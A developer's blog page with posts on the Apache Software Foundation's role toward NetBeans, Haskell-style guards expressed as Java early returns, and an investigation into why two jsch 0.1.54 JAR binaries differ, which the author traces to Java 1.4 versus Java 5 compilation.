What shocked me most during my involvement with NetBeans, now an Apache Software Foundation project, is that The Apache Software Foundation is a record label not a rock band.

Imagine you like a given band. You go to their concerts regardless of the location, enjoy their music, buy their records, maybe proudly wear a T-shirt. You deeply care about that band and the band cares about the music they make and their fans.

Once your band joins The Apache Record Label things might seem unchanged. The band still makes good music, released obviously exclusively through their new record label.

But something did change: while the band and the fans care about their future, the record label has a lot of bands to look after and only tangentially cares about a particular band. The band is also not doing much better since all their sales go towards the maintenance of the main music venue, lawyers, trademark protection, distribution fees, etc.

The misunderstanding about The Apache Software Foundation must have been caused by the fact that initially the Foundation was about a big and important project: the Apache HTTP Server. At that time I believe the fate of the project was quite important. Nowadays I believe the Foundation could retire the Apache HTTP Server and survive unscathed.

The other misunderstanding is caused by the fact that the technology landscape has some other software foundations, like the FreeBSD Foundation, the OpenBSD Foundation and the Mozilla Foundation, which are all about a single project. These foundations basically live and die by that project.

It's an odd situation. The Apache Software Foundation provides competent support for its projects but has no skin in the game. If a project fails, they will eventually acknowledge it in a board meeting and move on.

There's also no way to directly support a project via the Apache Software Foundation. The Foundation does not sponsor any kind of project software development. All the donations go to infrastructure and administrative costs. But projects rarely hurt for infrastructure while targeted development could help them and their users a whole lot.

Sunday, August 26, 2018

NetBeans Web Toolkit

I'm exploring NetBeans Web Toolkit with the articles here

NetBeans Web Toolkit is the new name I'm trying to give to Jaroslav Tulach's HTML/Java API, a rather impressive library that deserves more use.


Friday, March 02, 2018

Guards in Java

Haskell functions have this nice concept called 'guards' which allow you to define a condition and return a value when that condition is true.

For example:

abs n
  | n < 0     = -n
  | otherwise =  n

This makes the code rather readable, especially when you have more guards.

Guards build one upon another: if your guard condition is being checked, you know that all the previous ones failed:

something n
  | n < -2 = 10
  -- below we know that n >= -2
  | n < 0 = 8
  | otherwise = n

Back in Java land, where I get paid, I sometimes wondered if I should write a method as:

X method(Y param) {
  if (!param.isSomething()) {
    return null;
  } else {
    return param.getX();
  }
}

or if I should write it as

X method(Y param) {
  if (!param.isSomething()) {
    return null;
  }

  return param.getX();
}

I generally prefer the 2nd variant and now I realised these are a form of function guards!
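As a rough illustration of how the early-return style scales to several guards, here is a sketch that mirrors the Haskell `something` function from earlier in this post. The class name `GuardsDemo` is made up for the example.

```java
// Hypothetical demo class: early returns used as "guards",
// mirroring the Haskell `something` function.
class GuardsDemo {

    static int something(int n) {
        if (n < -2) {
            return 10;
        }
        // below we know that n >= -2
        if (n < 0) {
            return 8;
        }
        // "otherwise": every earlier guard failed, so n >= 0
        return n;
    }

    public static void main(String[] args) {
        System.out.println(something(-5));
        System.out.println(something(-1));
        System.out.println(something(7));
    }
}
```

Each `if` only has to state its own condition, because reaching it already implies that every earlier guard failed.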



Wednesday, October 04, 2017

The case of the different jsch 0.1.54 binaries

As part of the Apache NetBeans IP clearance we are combing through all the code and dependencies.

One interesting thing we bumped into was that the jsch 0.1.54 binary JAR we are using has a different hash (and size) than the binary JAR from Maven Central.

The old hash is 0D7D8ABA0D11E8CD2F775F47CD3A6CFBF2837DA4, the new one is DA3584329A263616E277E15462B387ADDD1B208D.

Our binary is 278,612 bytes vs 280,515 bytes for the one in Maven Central.
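For anyone who wants to repeat the comparison, a minimal sketch of computing the size and hash of a JAR follows. It assumes the hashes above are SHA-1, which the 40 hex digits are consistent with but which the post does not state. The class name `JarFingerprint` is made up, and the file paths are whatever you pass on the command line.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// Hypothetical helper: prints size and SHA-1 (assumed hash type) of each file given.
class JarFingerprint {

    // Returns the SHA-1 digest of the data as upper-case hex.
    static String sha1Hex(byte[] data) {
        MessageDigest md;
        try {
            md = MessageDigest.getInstance("SHA-1");
        } catch (NoSuchAlgorithmException e) {
            // SHA-1 is a required algorithm on every Java platform
            throw new IllegalStateException(e);
        }
        StringBuilder hex = new StringBuilder();
        for (byte b : md.digest(data)) {
            hex.append(String.format("%02X", b));
        }
        return hex.toString();
    }

    public static void main(String[] args) throws IOException {
        for (String path : args) {
            byte[] data = Files.readAllBytes(Paths.get(path));
            System.out.println(path + ": " + data.length + " bytes, SHA-1 " + sha1Hex(data));
        }
    }
}
```

Run it with both JAR paths as arguments and compare the two output lines.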

Our version is actually the same as the one found on http://www.jcraft.com/jsch/

Also, the Maven JAR is properly signed with the author's CA7FA1F0 key.

This is where it becomes clear that reproducible builds are important. You do not want to have to wonder why a binary differs, especially years later when you are doing a review. And this one is a library doing SSH!

So, why the different binaries?

It seems the original JAR was compiled on Aug 30, 2016 with Java 1.4 (major version 48) while the Maven Central JAR was compiled Sep 3, 2016 with Java 5 (major version 49).
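The major version can be read straight from the first eight bytes of any class file: a 4-byte magic number (0xCAFEBABE), a 2-byte minor version and a 2-byte major version, all big-endian. Below is a small sketch that lists it for every class in a JAR. The class name `ClassVersion` is made up for the example, and this is not necessarily how the numbers above were obtained.

```java
import java.io.DataInputStream;
import java.io.IOException;
import java.nio.ByteBuffer;
import java.util.Enumeration;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

// Hypothetical helper: reports the class file major version of each class in a JAR.
class ClassVersion {

    // Expects at least the first 8 bytes of a class file.
    static int majorVersion(byte[] header) {
        ByteBuffer buf = ByteBuffer.wrap(header); // big-endian by default
        if (buf.getInt() != 0xCAFEBABE) {
            throw new IllegalArgumentException("not a class file");
        }
        buf.getShort();                 // minor version, ignored here
        return buf.getShort() & 0xFFFF; // major version: 48 = Java 1.4, 49 = Java 5
    }

    public static void main(String[] args) throws IOException {
        if (args.length != 1) {
            System.err.println("usage: ClassVersion <file.jar>");
            return;
        }
        try (JarFile jar = new JarFile(args[0])) {
            Enumeration<JarEntry> entries = jar.entries();
            while (entries.hasMoreElements()) {
                JarEntry entry = entries.nextElement();
                if (!entry.getName().endsWith(".class")) {
                    continue;
                }
                byte[] header = new byte[8];
                try (DataInputStream in = new DataInputStream(jar.getInputStream(entry))) {
                    in.readFully(header);
                }
                System.out.println(entry.getName() + " -> major " + majorVersion(header));
            }
        }
    }
}
```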

The original JAR also concatenates strings using StringBuffer while the Maven Central JAR uses StringBuilder, newly introduced in 1.5, which should also be a bit faster since it's not synchronized.

Next, most of the cipher classes use some reflection via a static java.lang.Class class$(java.lang.String) method.

What is this? It's just the way class literals worked in Java 1.4. As explained here, in Java 5 the ldc and ldc_w instructions were extended so they can load a Class object directly.

In 1.4 the compiler supported class literals by generating a helper Class class$(java.lang.String className) method and replacing Person.class with a class$("Person") call.
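Written out by hand, the 1.4-era expansion looks roughly like the sketch below. This is an approximation from memory of what the old compiler generated, not decompiled jsch code. The class name `ClassLiteralDemo` and the cache field name are illustrative, and it uses java.lang.String instead of Person so that it runs on its own.

```java
// Hypothetical demo: approximates what a pre-Java 5 compiler emitted for String.class.
class ClassLiteralDemo {

    // Cache field, so the lookup by name happens only once (field name is illustrative)
    static Class<?> class$java$lang$String;

    // Helper the compiler added to any class that used a class literal
    static Class<?> class$(String className) {
        try {
            return Class.forName(className);
        } catch (ClassNotFoundException e) {
            throw new NoClassDefFoundError(e.getMessage());
        }
    }

    // What `String.class` turned into: a cached reflective lookup
    static Class<?> stringClassOldStyle() {
        return class$java$lang$String == null
                ? (class$java$lang$String = class$("java.lang.String"))
                : class$java$lang$String;
    }

    public static void main(String[] args) {
        // Both routes yield the same Class object
        System.out.println(stringClassOldStyle() == String.class);
    }
}
```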

In conclusion, it seems that excluding the Java 1.4 to Java 5 compiler changes, the two JARs are identical, with the Maven Central JAR even a bit better due to StringBuilder being used.

There is no check so far that the sources do produce the specific JAR. This is an exercise left for the reader.

Note: I have also cross-posted this blog post to the Apache NetBeans blog.
